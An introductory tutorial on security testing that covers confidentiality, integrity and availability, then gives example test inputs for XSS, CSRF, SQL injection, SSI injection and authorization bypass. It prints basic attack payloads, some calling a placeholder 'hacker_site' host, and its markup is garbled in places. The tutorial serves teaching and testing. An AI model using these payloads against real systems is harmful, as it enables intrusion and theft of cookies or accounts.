Security Testing or Security and Access Control Testing

Security testing is a testing strategy used to test the security of a system, as well as to analyze the risks associated with providing a holistic approach to protecting an application, hacker attacks, viruses, and unauthorized access to confidential data.

Software Security Principles

The overall security strategy is based on three main principles:

1. confidentiality
2. integrity
3. availability

Confidentiality

Confidentiality is the concealment of certain resources or information. By confidentiality you can understand the restriction of access to a resource for a certain category of users, or in other words, under what conditions a user is authorized to access this resource.

Integrity

There are two main criteria when defining the concept of integrity:

1. Trust . It is expected that the resource will be changed only in the appropriate way by a certain group of users.
2. Damage and recovery . In the case when the data is damaged or incorrectly changed by an authorized or unauthorized user, you must determine how important the data recovery procedure is.

Availability

Accessibility is a requirement that resources must be available to an authorized user, internal object, or device. As a rule, the more critical a resource is, the higher the level of availability should be.

Types of vulnerabilities

Currently, the most common types of software security vulnerabilities are:

• XSS (Cross-Site Scripting) is a type of software (Web application) vulnerability in which malicious scripts are run on a server-generated page to attack a client.
• XSRF / CSRF (Request Forgery) is a type of vulnerability that allows you to exploit the shortcomings of the HTTP protocol, while the attackers work as follows: a link to a malicious site is installed on a page trusted by the user; user (passwords, billing information, etc.), or sending SPAM messages on behalf of the user, or alters access to the user account, to gain full control over it.
• Code injections (SQL, PHP, ASP, etc.) is a type of vulnerability in which it becomes possible to launch executable code in order to gain access to system resources, unauthorized access to data or disable the system.
• Server-Side Includes (SSI) Injection is a type of vulnerability that uses the insertion of server commands into HTML code or launching them directly from the server.
• Authorization Bypass is a type of vulnerability in which it is possible to gain unauthorized access to another user’s account or documents.

How to test software for security?

We give examples of software testing for vulnerabilities in the security system. To do this, you need to check your software for known types of vulnerabilities:

XSS (Cross-Site Scripting)

XSS attacks themselves can be very diverse. Attackers can try to steal your cookies, redirect you to a site where a more serious attack will occur, load a malicious object into memory, etc., just by placing a malicious script on your site. As an example, consider the following script that displays your cookies:

<script> alert (document.cookie); </ script>

or a script that redirects to the infected page:

<script> window.parent.location.href = 'http: // hacker_site'; </ script>

or creating a malicious object with a virus, etc .:

<object type = "text / x-scriptlet" data = "http: // hacker_site"> </ object>

To view more examples, we recommend visiting the page: XSS (Cross Site Scripting) ...

XSRF / CSRF (Request Forgery)

The most frequent CSRF attacks are attacks using the HTML <IMG> tag or Javascript image object. Most often, an attacker adds the necessary code to an email or puts it on a website, so that when the page loads, a request is executed that executes the malicious code. Examples:

IMG SRC

<img src = "http: // hacker_site /? command">

SCRIPT SRC

<script src = "http: // hacker_site /? command">

Javascript image object

  <script>
            var foo = new Image ();
            foo.src = "http: // hacker_site /? command";
 </ script> 

Code injections (SQL, PHP, ASP, etc.)

We will consider insertions of the executed code on the example of the SQL code.

The login form has 2 fields - name and password. Processing takes place in the database through the execution of an SQL query:

  SELECT Username
 FROM Users
 WHERE Name = 'tester'
 AND Password = 'testpass'; 

Enter the correct name 'tester', and in the password field enter the line:

testpass 'OR' 1 '=' 1

As a result, if the field does not have the appropriate validations or data handlers, a vulnerability may appear that allows you to log into the password-protected system, since the SQL request will look like this:

  SELECT Username
 FROM Users
 WHERE Name = 'tester'
 AND Password = 'testpass' OR '1' = '1'; 

The condition '1' = '1' will always be true and therefore the SQL query will always return many values.

Server-Side Includes (SSI) Injection

Depending on the type of operating system, the commands may be different, as an example, consider the com *** y, which displays a list of files in the Linux OS:

<! - # exec cmd = "ls" ->

Authorization bypass

User A can access user B.'s documents. Suppose there is an implementation where, when viewing his profile containing confidential information, the userID is passed to the page URL, but in this case it makes sense to try to substitute the userID number of another user. And if you see his data, it means you have found a defect.

Conclusion

There are a huge number of examples of vulnerabilities and attacks. Even after conducting a full cycle of security testing, you cannot be 100% sure that the system is truly secure. But you can be sure that the percentage of unauthorized penetrations, theft of information and data loss will be several times less than those who did not conduct security testing.